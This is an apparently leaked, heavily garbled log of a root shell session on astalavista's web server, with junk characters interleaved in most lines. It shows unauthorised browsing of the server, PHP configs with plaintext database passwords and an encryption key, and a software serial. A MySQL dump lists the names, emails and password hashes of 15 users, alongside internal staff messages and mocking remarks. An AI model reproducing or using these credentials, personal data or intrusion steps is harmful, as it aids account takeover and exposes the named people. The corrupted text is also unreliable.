1 s/ a! e1 c! I% F% k3 s-rw-r–r–  1 astanet astanet  124 Dec 17 21:50 .bashrc
0 z6 A1 e' r% u# P) `# J7 Adrwx–x–x  3 astanet astanet 4096 Dec 23 12:18 domains6 _) J  F* w; @
drwxrwx—  3 astanet mail    4096 Dec 23 12:18 imap/ |: O+ C. Q3 }) a1 ~3 X
drwx——  2 astanet astanet 4096 Dec 23 12:18 mail! g; ^: |5 ?+ W
-rw——-  1 astanet astanet  197 Jun  4 09:51 .mysql_history
% O2 d" L7 F7 |4 `7 Klrwxrwxrwx  1 astanet astanet   37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html2 K  W& l  N# |6 i0 n( T% G/ b
-rw-r—–  1 astanet mail      34 Dec 22 12:41 .shadow' H. L0 i& j) x3 v: z8 Q3 {0 n: W
5 C' f- D% I' J* C4 Y% [' H/ l
sh-3.2# cd auth/6 w' D; U0 I7 D- r. T" i% p# ~. R
sh-3.2# ls -la1 ?$ [$ H% h8 n! g9 _
total 28# R1 K4 I, U" J& ], r
drwxr-xr-x 2 root    root    4096 Dec 23 16:00 .
; l* Y! y: z6 D) S5 d1 Hdrwx–x–x 6 astanet astanet 4096 Jun  4 09:51 ..
3 O$ J5 N0 f0 b. y2 a-rw-r–r– 1 root    root     321 Jan  5  2006 hackercontest.config.inc.php
! x) h; f) U' X" Z) k3 H' N-rw-r–r– 1 root    root     319 Jan  5  2006 hosting.config.inc.php  t; E- z/ ^6 x$ x1 m
-rw-r–r– 1 root    root      24 Jun  4 09:38 .htadm_pwd
* o# k/ S: L0 t5 |, N3 L-rw-r–r– 1 root    root      49 Jan  5  2006 .htpasswd_newhosting4 R; {: v5 y$ z3 O+ b7 T0 H; ]% g
-rw-r–r– 1 root    root      51 Oct 11  2006 .htwebalizer_pwd
1 u6 R$ L2 k+ }" J
' A4 H/ t  r" p3 Ush-3.2# cat hackercontest.config.inc.php0 R0 r( t. a7 X9 O* p
<?PHP, s$ h; A, K! c$ a: C' b4 z3 L1 N) `
// Variabeln f?r Verbindung zur Datenbank //
+ j  l5 g4 B' o  ~, m$conxHost = ‘localhost’;                       // MySQL hostname- D$ f; d4 k3 N, f" f7 a
$conxUser = ‘hackercontest’;                                       // MySQL user
" B) l% U( J' f. W" u4 Y4 c- B6 ^$conxPassword = ‘K6m@7dUc’;                    // MySQL password
% ?; S0 D" f* p$bfkey = ‘cXvB3981′;                                       // Encryption/Decryption Key for Blowfish
/ f9 |) P$ s* D! o" n?>
8 z6 a  h# F: q& I7 ash-3.2# cat hosting.config.inc.php
- o8 h0 J$ Y4 u2 [: Q  k0 E& [9 b<?PHP
7 A$ [6 T, |& k, S3 ^  n// Variabeln f?r Verbindung zur Datenbank //8 w; X4 s" Q* r' r5 E
$conxHost = ‘localhost’;                       // MySQL hostname- ^. B( o" W& K. j8 O2 Q; h0 l9 ^
$conxUser = ‘hostinguser’;                                 // MySQL user
) \, u- R) D8 W/ z4 ^4 \$conxPassword = ‘cXvB3981′;                    // MySQL password; J# Q  J% [& P$ B
$bfkey = ‘cXvB3981′;                                       // Encryption/Decryption Key for Blowfish# H+ i/ L& `& }# i3 b
?>
8 \% J( }+ \7 V3 p9 |4 c5 k- j  k9 S- a) _3 v3 \/ l
sh-3.2# cd ..! z% S; Y" q5 \, c8 o
sh-3.2# cd com8 R3 \6 r8 M. w  m
sh-3.2# ls -la
4 u4 g9 j; r' ^; b2 Xtotal 141208
4 E( ^) D- ~* f. w% X/ Wdrwx–x–x 10 com  com       4096 Apr 28 12:40 .: H" c: }6 _. B0 f# V0 m
drwxr-xr-x 14 root root      4096 Mar 11 17:56 ..
3 Z& ~) |: Y7 N/ g) sdrwx——  2 com  com       4096 Jun  4 04:04 backups% z1 E0 m, T  V* @
-rw-r–r–  1 root root   2419504 Sep 28  2007 backup.sql" S3 c" Z# L% F! B
drwxr-xr-x  2 com  com       4096 May 12 15:20 backup_system
& i6 @0 r/ ~$ g9 Z* y3 q/ V9 ^-rw——-  1 com  com      21880 Jun  2 08:07 .bash_history# A" d7 T8 C* q. L: j& a
-rw-r–r–  1 com  com         24 Sep 24  2007 .bash_logout5 N* \2 j* x* Q
-rw-r–r–  1 com  com        176 Sep 24  2007 .bash_profile
/ Z; G" E8 c( G% u1 O-rw-r–r–  1 com  com        124 Sep 24  2007 .bashrc
! C, ]; J; C8 w6 {% K: Q5 Ldrwx–x–x  3 com  com       4096 Jan 29  2008 domains0 [6 J2 n+ z, e' r" o
-rw-r–r–  1 com  com      16409 Jul 16  2008 FWUser.class.php.fixed  H; ^9 Z( [% P
drwxrwx—  3 com  mail      4096 Jan  6 19:24 imap
! n% ?3 `4 Z0 ~5 _* h-rw——-  1 com  com         69 Nov 18  2008 .lesshst0 z9 k" ?3 _" F1 r" t- H) f
drwx——  2 com  com       4096 Sep 24  2007 mail
+ |+ _* }) {. [-rw——-  1 com  com      13970 Mar 28 21:42 .mysql_history. O5 y( q9 ?2 c0 j2 l
drwxr-xr-x  2 com  com       4096 Aug 20  2008 .ncftp
) K+ Q" j+ W4 [- }. `lrwxrwxrwx  1 com  com         37 Sep 24  2007 public_html -> ./domains/astalavista.com/public_html, Z. Y; T# w6 A; O( u3 ?& f
-rw-r—–  1 com  mail        34 Sep 24  2007 .shadow2 C' m3 [5 ]$ p  s8 z  M
drwx——  2 com  com       4096 Aug 26  2008 .ssh
! B2 e9 N' W( A9 A1 j1 W-rwx——  1 com  com       8515 Feb 10  2008 t9 O, \' t% E$ O. s
-rw-rw-r–  1 com  com       6265 Feb 11  2008 t.c+ N. v3 }4 L& b. o; H" b
drwxrwxr-x  2 com  com       4096 Jan 30 15:47 tmp6 P! s# }7 c( l+ S3 f
-rw-rw-r–  1 com  com        617 May 20  2008 .toprc$ B% o6 r. j/ D# C3 i
-rw-rw-r–  1 com  com  141851766 May 19  2008 version2-backup-20080519-0900.sql% I. [" _4 P) ^8 E: r/ G7 N
-rw——-  1 com  com      16629 Mar 28 21:46 .viminfo' H0 o# H1 @+ t( M$ o' Z' s
-rw-rw-r–  1 com  com         51 Aug 25  2008 .vimrc
0 z! ?( C* U- m# a7 S$ C
9 z; o7 a: L. _4 ]* I" [sh-3.2# head t.c, h1 l' H8 F1 @: r
/*9 j. }" T, r) b. O  ]$ A
* jessica_biel_naked_in_my_bed.c
- A9 X) k% c" o/ q  ?*# t3 J, v  G8 j, Z6 m& m( F9 D
* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.
- b3 o8 W! ^5 n+ H; s; s9 N8 g* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.3 b  O: a4 ?+ m- |$ A
* Stejnak je to stare jak cyp a aj jakesyk rozbite.
" V, s( t7 r, @*
9 O' Z- `( l) n$ x3 p* Linux vmsplice Local Root Exploit
$ Q% \- G3 l" }" z( ~* By qaaz
0 [! u, ^& H$ R6 E3 m*
! z7 l; e. P, z, h* Y* `9 t4 M
% G+ t7 Z0 b4 H% U4 Gsh-3.2# cd /
2 U1 }: ^9 M7 w, r* K! m+ R  y, ash-3.2# ls -la
$ ]1 q  t; X! r6 ?* ytotal 360* B# d* y5 c  Y" a0 x" N
drwxr-xr-x  25 root root   4096 Jun  3 02:43 .
9 D6 e% `6 b: h3 _3 d! bdrwxr-xr-x  25 root root   4096 Jun  3 02:43 ..7 M7 Q3 l; a7 X8 ~. o  t$ l& M. H
-rw——-   1 root root  10240 Jun  3 02:39 aquota.group0 m# z2 U0 y1 p3 j; w) m2 x
-rw——-   1 root root  10240 Jun  3 02:39 aquota.user) A" ?) }9 j. s% N: w; M1 T8 t% ~
-rw-r—–   1 root root    819 Jul 17  2008 astalavista.us.db" v2 |3 Z# J  d  w3 \
-rw-r–r–   1 root root      0 Jun  3 02:43 .autofsck
" D7 I( p6 w1 ^; A- Z( F3 ~9 E4 O-rw-r–r–   1 root root      0 Sep 16  2007 .autorelabel
" k& d8 g8 J) \  w+ D7 s. p+ i* o$ ?drwxr-xr-x   3 root root   4096 Dec 29  2007 backup
7 w# S7 s# @  f# |( Zdrwxr-xr-x   2 root root   4096 Jun  4 04:03 bin4 [' t' }3 r; o/ `/ S" C
drwxr-xr-x   5 root root   4096 Jun  2 14:06 boot
; c4 I& Y8 B) w( U$ b( Ddrwxr-xr-x  11 root root   3620 Jun  3 02:43 dev
; j8 A2 L1 P/ @drwxr-xr-x  84 root root  12288 Jun  4 03:16 etc
9 Z$ g2 U0 m' V8 edrwxr-xr-x  14 root root   4096 Mar 11 17:56 home( I) }) j( ^# c( W. i1 T1 l
-rw-r–r–   1 root root  13387 Mar 20  2008 httpd.conf
* m7 s9 b- m" t  T4 Tdrwxr-xr-x  11 root root   4096 Jun  4 04:02 lib
& D: |0 n3 M( vdrwxr-xr-x   7 root root   4096 Jun  4 04:03 lib641 u# J4 k* P+ s
drwx——   2 root root  16384 Sep 11  2007 lost+found: o) L/ m2 G5 o7 I1 Q4 f
drwxr-xr-x   2 root root   4096 Mar 11 17:56 media' B* S0 |- ^# G4 x8 Y  q. z
drwxr-xr-x   2 root root      0 Jun  3 02:43 misc
8 b- h- k: j; t8 `/ zdrwxr-xr-x   2 root root   4096 Mar 11 17:56 mnt7 w5 S# a2 Z3 ?5 ~6 w
-rw-r–r–   1 root root   5859 Feb  3  2008 mrtg.cfg
7 L- r' p8 d' M, Rdrwxr-xr-x   2 root root      0 Jun  3 02:43 net, e4 T5 C" J: e- P
drwxr-xr-x   3 root root   4096 Mar 11 17:56 opt
- h7 ~  n7 R( q" J* Y0 V" D1 rdr-xr-xr-x 264 root root      0 Jun  3 02:42 proc
5 A4 l: p+ Y- jdrwxr-x—  15 root root   4096 Jun  4 08:40 root
$ }' O! R8 u- N+ B/ p) Odrwxr-xr-x   2 root root  12288 Jun  4 04:03 sbin  z/ x4 N1 n( [) D
drwxr-xr-x   2 root root   4096 Mar 11 17:56 selinux! u; Q5 ?8 B8 h
drwxr-xr-x   2 root root   4096 Mar 11 17:56 srv
3 M9 K3 U* t% V! |$ P% Kdrwxr-xr-x  11 root root      0 Jun  3 02:42 sys
7 _4 b! p' {* M& c8 C9 C, tdrwxrwxrwt   4 root root 122880 Jun  4 10:35 tmp
! l( N( N2 k4 _9 n* y6 Pdrwxr-xr-x  16 root root   4096 Jun  2 13:56 usr! o6 ^; b' s) I4 x
drwxr-xr-x  26 root root   4096 Jun  4 03:16 var
4 w) V' _  g. B' c6 x7 p) Q
7 q9 z; D9 H4 I/ osh-3.2# cd opt
: u& X' f; Y3 lsh-3.2# ls -la- ~& V  ?  M) a0 M8 Y
total 20
- C) Y; x9 E, \drwxr-xr-x  3 root root 4096 Mar 11 17:56 .3 J8 x4 y1 X- j' i, e
drwxr-xr-x 25 root root 4096 Jun  3 02:43 ..4 n. c/ G5 F0 I- C. ^
drwxr-xr-x 15 root root 4096 Mar 20  2008 lsws2 w2 S5 {0 W3 E; i, J, Q, }; e9 B

. @/ k0 i$ N3 I# ?sh-3.2# cd lsws/
% v+ y% u1 a$ {' Ush-3.2# ls -la# H# p5 ]0 O3 y$ M4 t
total 1083 q1 ~* J* R; w& w8 P0 Q
drwxr-xr-x 15 root   root    4096 Mar 20  2008 .4 S! k# u7 }4 p1 ^; f# x7 x) O/ C' ~/ g8 R
drwxr-xr-x  3 root   root    4096 Mar 11 17:56 ..2 N3 ~, m5 n. z% x6 z% D' L
drwxr-xr-x  8 root   root    4096 Mar 20  2008 add-ons
4 A' v' p/ a* Y3 m$ I- ndrwxr-xr-x 13 root   root    4096 May 29 15:10 admin3 p5 E. U1 @4 S" r
drwxr-xr-x  5 apache apache  4096 May 29 15:10 autoupdate
7 h* \* _- W, u' F. b5 \' ^. |' C, rdrwxr-xr-x  2 root   root    4096 May 29 15:10 bin) v7 w4 M# T' Y
drwx——  4 apache apache  4096 Jun  3 02:43 conf7 {) X- S( c% S2 f0 M1 k# ?$ u
drwxr-xr-x  7 apache apache  4096 Mar 20  2008 DEFAULT! Z7 N9 _/ n8 G4 W1 Z
drwxr-xr-x  2 root   root    4096 Sep 15  2008 docs
5 h6 a6 G: g1 ^! c! mdrwxr-xr-x  2 root   root    4096 May 29 15:10 fcgi-bin
6 n! L$ ~2 \$ h  K4 y' h# O' \. I1 jdrwxr-xr-x  2 root   root    4096 Sep 15  2008 lib
/ X" P$ h5 a* N7 O1 A-rw-r–r–  1 root   root    6959 May 29 15:10 LICENSE0 P% L9 }) b  o$ {5 p8 {
-rw-r–r–  1 root   root    2214 May 29 15:10 LICENSE.OpenLDAP
4 c, `0 g) G! @5 G1 e0 N-rw-r–r–  1 root   root    6279 May 29 15:10 LICENSE.OpenSSL
" [0 J9 M& m7 {" B6 N! H; c-rw-r–r–  1 root   root    3208 May 29 15:10 LICENSE.PHP
. J% k/ r# p2 i+ rdrwxr-xr-x  2 root   root   20480 Jun  4 09:55 logs
; z# |; h+ s; }* q/ E- J+ bdrwxr-xr-x  2 root   root    4096 Mar 20  2008 php
% c& M% E, @( B3 i7 _' Q: k& F1 jdrwx——  2 apache apache  4096 Mar 20  2008 phpbuild9 y" k1 P/ H- f: U( I
drwxr-xr-x  3 root   root    4096 Mar 20  2008 share# f3 ~) l3 K6 X" o3 `
-rw-r–r–  1 root   root       6 May 29 15:10 VERSION
8 O: r3 P$ o4 a! y
' J- U9 @6 a1 J: k9 ^# Y; B- lsh-3.2# cd conf" D# h2 i* m+ R" G: ]* ?8 a1 d/ |
sh-3.2# ls -la
3 R9 b3 ^8 G" ]5 rtotal 48* K. m3 \) U5 o% \9 q0 ^  x8 Q
drwx——  4 apache apache 4096 Jun  3 02:43 .- r, ?. l1 Q& o5 H! T# [! y  `
drwxr-xr-x 15 root   root   4096 Mar 20  2008 ..
; e- Y8 ^# Z$ g. ~+ T8 Jdrwx——  2 apache apache 4096 Mar 20  2008 cert' K' v  d# V" K7 k
-rw-r–r–  1 apache apache 6668 May 29 15:13 httpd_config.xml: e/ `6 s2 o3 q2 X
-rw——-  1 apache apache 6613 May 27 18:33 httpd_config.xml.bak
+ {: a5 R/ R9 s9 j7 r) }- g-rw-r–r–  1 root   apache    0 Jun  3 14:11 .last
7 D: q+ r# [+ D9 i; J-rw——-  1 apache apache  256 May 29 15:10 license.key
! c% z7 B6 l2 t1 C5 v" p-rw——-  1 apache apache  256 Mar 21  2008 license.key.old* D8 \% z/ |9 J2 t
-rw——-  1 apache apache 3320 Mar 20  2008 mime.properties" K; ]; ]; Y( N
-rw——-  1 apache apache   20 May 29 15:10 serial.no
( J) M8 [& E" R0 E" Jdrwx——  2 apache apache 4096 Mar 20  2008 templates1 }7 ?$ ^" L( j6 f. v

1 U$ n; S: Y4 T1 P4 }4 dsh-3.2# cat serial.no; B- x1 T4 `) q1 _
IbDl-oVsO-CKqL-wVRa( r3 l& c; s: m- P% ^
+ ]7 a5 Y4 h( W& e- L
sh-3.2# mysql
+ W7 R7 T9 X& D4 gWelcome to the MySQL monitor.  Commands end with ; or \g.) O! z! O! b5 I" ^. F1 f. g
Your MySQL connection id is 286844
- d; B) z& H& b- @Server version: 5.0.45-community-log MySQL Community Edition (GPL)
; n9 B" p! a5 f0 Q. Q, q# M- p8 c; m1 I" O8 Z; ^
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
4 Q6 Y  ?$ N/ d/ @/ L
1 P$ `' k" H9 ^% B  L3 ]  P8 F7 smysql> show databases;: m2 x8 v9 J& R2 D" m' P
+———————–+8 ^9 r$ i5 B$ p( H
| Database              |- `; \4 S/ T* T" S2 h
+———————–+$ A8 X" l- W- K* e
| information_schema    |
9 i" q1 }- B; D% m8 P5 j| astanet_ads           |
. m: T) g9 S$ O5 W) J2 v: `| astanet_mailing_lists |
! ], {6 m8 i' q/ _( d| astanet_mediawiki     |1 ]6 L7 D9 a% E/ j) S6 F1 o- t$ T
| astanet_membersystem  |
1 I/ x6 ?$ V* j3 D) \+ h8 ?+ F| com_contrexx          |
! }4 h( Y  \" [% @| com_contrexx2         |
6 `- z( Z9 U% ^; y  B| com_contrexx2_live    |6 e8 Y( z3 l7 R& o& J' y) U6 i* i
| da_roundcube          |
8 r: @! n/ p  A! q, ], N" t| dolphin               |+ ~( p8 W9 S4 I3 [2 W: c
| ideapool              |
( u! w  {, }' B4 x5 f| mysql                 |
( R) `) d7 }4 H| test                  |2 Y+ z9 c: F* F$ ^, F3 o1 d! |" A
| yourmaster            |1 F0 I7 _' m6 O8 Y" V
+———————–+
8 ^5 z/ N4 O; r7 \5 y  N9 M# y& M14 rows in set (0.00 sec)2 b' K; w; X* i- |4 q+ w  x. J% W9 ^* d

0 Z. f: t4 ?3 t* C# h% bmysql> use ideapool, l' U+ p0 a' {
Database changed
3 [" ?: y* E/ P" v5 s9 u% R+ A8 Omysql> show tables;
' k( E5 q5 `" O; T8 r+———————————–+6 @9 ~/ ~% B, C" ~& A
| Tables_in_ideapool                |- R4 H- R& [( ]( z' \( P
+———————————–+
0 c: D5 a/ R6 @) \9 j| eventum_columns_to_display        |
# e/ s1 ^1 Z3 d- j| eventum_custom_field              |, J! ^1 i# s2 q4 o2 h  p, M
| eventum_custom_field_option       |7 f2 M1 `+ g- B6 n/ `' S
| eventum_custom_filter             |7 X7 e5 n( p5 m' v  Y! }2 a
| eventum_customer_account_manager  |9 W5 a. k, i/ Z  ^: O
| eventum_customer_note             |
" k0 Q2 R5 V% B7 T7 {' || eventum_email_account             |9 a6 m$ x- ?. _( _% c+ L+ |
| eventum_email_draft               |
! G5 d- a$ d$ R5 ^| eventum_email_draft_recipient     |* v" N! h" c" c* S, ~
| eventum_email_response            |$ {' m* ~+ z+ }+ o2 q/ f2 k
| eventum_faq                       |
6 W* g& s/ M7 e; u& `! z| eventum_faq_support_level         |+ }; l, e( j" R
| eventum_group                     |
6 {, c3 p5 E. j& Z! A| eventum_history_type              |/ p* K, \" m3 L4 F
| eventum_irc_notice                |+ {% t7 p3 ~# d2 r. A$ v4 o
| eventum_issue                     |2 t3 h0 h& F+ Q# P1 q/ I' a
| eventum_issue_association         |! v: {1 Z: O- s% ~
| eventum_issue_attachment          |
1 [/ o0 m  `% b; }  _| eventum_issue_attachment_file     |
8 g4 Q7 L% f* D8 G| eventum_issue_checkin             |
3 M3 z- K, t; |& c| eventum_issue_custom_field        |
0 R' Q6 W2 F; m/ X0 j1 {# t| eventum_issue_history             |* i+ N. a. O) P
| eventum_issue_quarantine          |0 z7 ^4 a  R# b
| eventum_issue_requirement         |
9 r' D% e9 h: a3 {4 t| eventum_issue_user                |
$ e4 h( Q, x& z6 E| eventum_issue_user_replier        |
. y. |, Q9 K% v8 R8 a| eventum_link_filter               |
8 r, x1 C: w2 e0 x  r| eventum_mail_queue                |
( M  h( H, z5 T. P7 Z! b| eventum_mail_queue_log            |
, p& o" y, @8 B: w| eventum_news                      |$ F5 N6 G! Z& t2 C5 E2 v& N& w, Q
| eventum_note                      |
- v; F8 f0 o0 ~* }- Z| eventum_phone_support             |
3 s; V3 L; H+ o| eventum_project                   |0 v* K- t0 D6 q- K& V# Z
| eventum_project_category          |9 a) n& v& h# x% Z$ [
| eventum_project_custom_field      |/ _+ L5 a1 F: C! e- i4 K, f
| eventum_project_email_response    |) a) g" C1 s3 F8 O; e
| eventum_project_field_display     |
; G  x( g" k) {. g) P* H| eventum_project_group             |9 Y/ R  T4 G; l8 U, \
| eventum_project_link_filter       |3 y. x8 z/ ^" n  [! i
| eventum_project_news              |
. \: ]2 ?4 b9 \4 c| eventum_project_phone_category    |
& J2 k6 `' R! v5 t1 I1 W. u4 Z  H| eventum_project_priority          |
1 d, L7 X' x% E4 L1 V, _& F| eventum_project_release           |/ ~. {7 d1 R  S
| eventum_project_round_robin       |9 |7 o2 b+ U2 z; O( T7 i
| eventum_project_status            |
# `1 }6 q" Z4 v- }& a& u+ X| eventum_project_status_date       |
( K& T* R8 {5 W: k5 V# {, n# j* l| eventum_project_user              |
& h: v- ]! W7 j$ V/ k; I$ w' l| eventum_reminder_action           |
) |) L; I" \) E# x| eventum_reminder_action_list      |
0 o/ Q  Y% Y; J2 Q5 I  V, K# z| eventum_reminder_action_type      |
( A. Z* d$ c2 V| eventum_reminder_field            |7 Y' n4 F# J; m* K$ P; g
| eventum_reminder_history          |
8 d# C$ I0 p% [9 S0 z- c/ I| eventum_reminder_level            |
- y' u9 f- B# y+ M" z| eventum_reminder_level_condition  |) p" @9 E6 L4 }" M8 u) B5 D" Z
| eventum_reminder_operator         |/ |% O, H6 `. }$ I5 g9 Q! n3 @
| eventum_reminder_priority         |# H( }( J% J& g8 B9 j7 @8 s
| eventum_reminder_requirement      |* G, k: Z2 O* c4 t
| eventum_reminder_triggered_action |$ `7 Q/ X/ P  b8 f/ m9 x. ?" b
| eventum_resolution                |
3 ]% G* f  s) u- {1 E| eventum_round_robin_user          |
  }$ A/ p' k3 Q7 u| eventum_search_profile            |
, A6 F- f0 {0 k1 c5 ^3 j| eventum_status                    |1 K5 X2 C4 Q' Z
| eventum_subscription              |* G+ J  d( ^$ Z. h
| eventum_subscription_type         |
# u3 ~1 P7 B4 B! n. y" s2 h4 {| eventum_support_email             |
2 l6 U, S8 X# R! X7 {| eventum_support_email_body        |3 j/ o* I0 h1 |/ s
| eventum_time_tracking             |
* i" \# G- c2 s| eventum_time_tracking_category    |" L) p9 r1 R- a8 U
| eventum_user                      |1 n% C0 e4 z' L5 \- E# a
+———————————–+0 S) s: h3 O# W& L) E  k
69 rows in set (0.00 sec)) Y2 t: S0 ?" w9 b
5 i& K2 s9 P) O: E
mysql> describe eventum_user;/ m! Z0 `/ E6 h  _" d& u- @" ?. C
+————————-+——————+——+—–+———————+—————-+7 P6 b7 _: G, [9 `5 C+ b
| Field                   | Type             | Null | Key | Default             | Extra          |
& }  t4 b% N( r6 [7 d+————————-+——————+——+—–+———————+—————-+  ?( D0 R, _- P9 V. a& O, a
| usr_id                  | int(11) unsigned | NO   | PRI | NULL                | auto_increment |6 l. p1 Y  a4 S' o' _
| usr_grp_id              | int(11) unsigned | YES  | MUL | NULL                |                |
% n& {8 \& M+ x7 l+ a9 N6 [| usr_customer_id         | int(11) unsigned | YES  |     | NULL                |                |8 z% s1 r: L9 Y$ P" Y; _9 s
| usr_customer_contact_id | int(11) unsigned | YES  |     | NULL                |                |
  s- d' }; V0 n* q, n| usr_created_date        | datetime         | NO   |     | 0000-00-00 00:00:00 |                |
+ Q. `( y$ a0 l% N/ }| usr_status              | varchar(8)       | NO   |     | active              |                |' b* E  v! l0 e) ?- d7 X
| usr_password            | varchar(32)      | NO   |     |                     |                |
0 Q0 ?# k( D1 q' F| usr_full_name           | varchar(255)     | NO   |     |                     |                |
: E" S! I. h+ v9 G7 ^4 _| usr_email               | varchar(255)     | NO   | UNI |                     |                |
6 o, q8 T3 q- I( E/ x( \| usr_preferences         | longtext         | YES  |     | NULL                |                |
$ @6 C5 l& b3 Q3 x| usr_sms_email           | varchar(255)     | YES  |     | NULL                |                |$ D8 D7 Q( l% Z+ g7 |) u7 e
| usr_clocked_in          | tinyint(1)       | YES  |     | 0                   |                |2 j# C6 |+ b( D2 c
| usr_lang                | varchar(5)       | YES  |     | NULL                |                |0 ]8 A: k; \/ f2 J
+————————-+——————+——+—–+———————+—————-+7 K2 ]) f6 [+ l7 E
13 rows in set (0.00 sec)
7 H: X! V4 E+ M0 W% r8 ^  `7 k$ ^5 n, r# A/ Y6 p
mysql> select usr_full_name,usr_email,usr_password from eventum_user;9 |& y. i* b) S7 |  U
+———————-+——————————-+———————————-+
1 f" L  k6 O0 J2 g" q| usr_full_name        | usr_email                     | usr_password                     |" n) A0 ~& J2 |- J3 q& Z
+———————-+——————————-+———————————-+0 N( G9 Y4 O( s5 X* n9 c- n
| system               | 链接标记system-account@example.com    | 14589714398751513457adf349173434 |) E% [- e9 s) w
| Developer (Paulo)    | 链接标记paulo.santos@astalavista.ch   | 26a35a1cf8895c27fb37ef4cf149f7bb |. F. r% O1 I  w) U" s& b
| Be1er0ph0r           | 链接标记be1er0ph0r@gmx.de             | 229766dc0ca1fb67160a8782321dfdce |
+ F' `. B7 ^, c' R7 V| Admin                | 链接标记pascal.mittner@astalavista.ch | 57c2877c1d84c4b49f3289657deca65c |0 [5 U0 D  r8 f) v
| ADMIN                | 链接标记admin@astalavista.ch          | f6fdffe48c908deb0f4c3bd36c032e72 |
. U: I3 i; z- W/ M! p, S5 }| USER                 | 链接标记user@astalavista.ch           | 5cc32e366c87c4cb49e4309b75f57d64 |
- V$ P9 h2 C; u0 @, D| Glafkos - (nowayout) | 链接标记glafkos@astalavista.com       | f7735ab119023a8abb2301e67f81cd67 |
. s2 f9 L) @( H1 q1 t% @/ l| Joao                 | 链接标记joao.pontes@astalavista.net   | f805c071d7c823b937448c54c047b9fd |5 y. b: G: x; y. ?* a4 \
| Pascal               | 链接标记pm@astalavista.ch             | e10adc3949ba59abbe56e057f20f883e |
/ G: \6 R. B4 t6 B| commander            | 链接标记commander@astalavista.com     | 932cd250918f881d41feb0b93883a926 |+ p+ q" \+ j6 I# G, F) U8 b5 G
| ishtus               | 链接标记ishtus@astalavista.com        | a587ffc88b3dbbba3fd2fe67af649ff0 |4 j- s' N! e+ ^: T. i, A
| sykadul              | 链接标记sykadul@astalavista.com       | 20224a2f3eeb57a13a10b4df543c128e |
- T# f, j( D6 n1 ]! A, o& ]| Zach McElroy         | 链接标记admin@badfoo.net              | 33c5d4954da881814420f3ba39772644 |
" Q; I9 D# l  d| usb                  | 链接标记usbenigma@hushmail.com        | b513f22c3db6932855ad732f5f8a10a2 |6 A! f) ~( ^9 a; l1 t
| cyph3r               | 链接标记cyph3r@astalavista.com        | 6e1e50017a945e874d52ec91f9ab2cee |+ Y8 A3 {$ U  z5 d0 a" z
+———————-+——————————-+———————————-+1 F( q+ P+ U' D3 D* {! X
15 rows in set (0.00 sec)# r7 W% K+ J# f+ y+ Z7 A* K

7 y! z& H3 A6 D8 B/ z: }mysql> select iss_description from eventum_issue where iss_id = 43;
& _" T: D9 S$ g# q" G; o4 ~3 L+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
4 `1 R+ v+ p- L| iss_description                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
$ G' @  D2 H* D- D3 U|  w; o" ^, c! p3 \; Q
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+1 n* z* \5 @2 K1 ]3 \
| Ok guys, to boost our traffic and revenue what we have to do is keep users logged in… how to do that? well think about it… if a user is watching a movie… he’ll be
3 |+ M7 o+ @" {! J0 b/ M. nconnected for 90 mins… 120mins… so what i propose is something like:/ x' w. a' n- H
链接标记[url]http://www.surfthechannel.com/[/url]
7 R$ E" l' `" ?) o) T2 ~since they only provide LINKS to the movies they are LEGAL and don’t break DMCA rules… so we could do the same… “iframe” the content on our website or use a system. m( c$ U9 ^3 E7 `0 P3 d
like podcast that uses our own flash player to stream content from other places, therefore the content NOT BEING HOSTED ON OUR SERVERS but only viewed… which doesn’t
, A" y  A) f9 P; |break any laws as far as i am aware (we should research on that just to be sure though!) Of course we would have to provide users with the button to take the content off; L1 j' J0 M& P  w  X' d
if they think it breaks copyright laws and we will remove it… i think that makes it on the border of DMCA…5 e, o, Y7 e& k7 R* r& n% F
, i6 N7 X) g$ M; y5 b
We could also put advertisement during play on the flash video player itself… extra $$…  ]1 `% n! E6 b& @6 O- a7 S

0 _5 H7 k1 o# iBy sykadul |5 Q, B  H" v9 q% k5 C& z
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
: \0 Z8 M2 ^5 C) S  x' `1 row in set (0.00 sec)0 \" @1 F  H2 s8 e

! M; A7 O( H" t+ @// Money and extra $$ is all they care about. remember that.
  p% m' }; J* S6 Z# X  G: O& m
; @/ z! D3 O. A8 l" x3 `- Gmysql> select iss_summary,iss_description from eventum_issue where iss_id =42;
7 b# N% S6 {4 v) s. J  z1 |' X+————————+——————————————————————————————————————————————————————————————————————————————-+
: ^0 M4 p" v6 o| iss_summary            | iss_description                                                                                                                                                                                                                          ; m. k. O1 y; k: h
|' V/ c! x6 |; p0 V8 U
+————————+——————————————————————————————————————————————————————————————————————————————-+
6 X' T1 p) e. a# v/ c| Forum for REAL EXPERTS | Hello,5 U$ D! A7 G& [7 Z  K4 g

% w6 x% ~" Q, }. {Ishtus and I,
! y4 f/ `0 Q% Z: u; p
6 |) T- T: l6 eCame up with a crazy and very workable and professional idea. We create an invitation only forum with the BEST security experts worldwide
. }) J; ]1 ?9 K' j: x5 l8 cONLY. Security Experts from Bugtraq lists, exploit writters, reverse engineers etc..
) X9 V& a- D+ A9 C2 {; v) l+ D& }& y% ~8 |5 |! j6 L$ E
One example a friend of mine from coresecurity.com!
' a" n( [1 G5 j5 ]6 V# l% }% Z
! G+ o. j2 G. j$ F. {' i7 }We could have big projects etc.. and we can work all together to bring to the security community exploits, open source software etc..2 t/ t5 g$ Z9 ~" P

( `0 H+ J& G( g( N$ r  R* t) p|! S% R0 v% P8 Y4 R# R
+————————+——————————————————————————————————————————————————————————————————————————————+
6 S& D3 Y0 ?9 u6 m5 m$ G5 y3 {1 row in set (0.00 sec)! @# k2 a# p7 K; n& D, Y! P: c
0 S* l* o1 J1 }0 y
// What an awesome yet original idea Ishtus and him… bring MORE security “experts”, thats exactly what the world needs…
% U1 T& M; B& w* H( r
! R1 ^) N  K0 Dmysql> select iss_summary,iss_description from eventum_issue where iss_id = 16;
, e! M% B' P6 t3 B) X* f+——————+———————————————————————————————+' P: U+ Q- N- s! v6 V# b
| iss_summary      | iss_description                                                                             |6 ?, D5 F, ^* L; k. P. @7 v
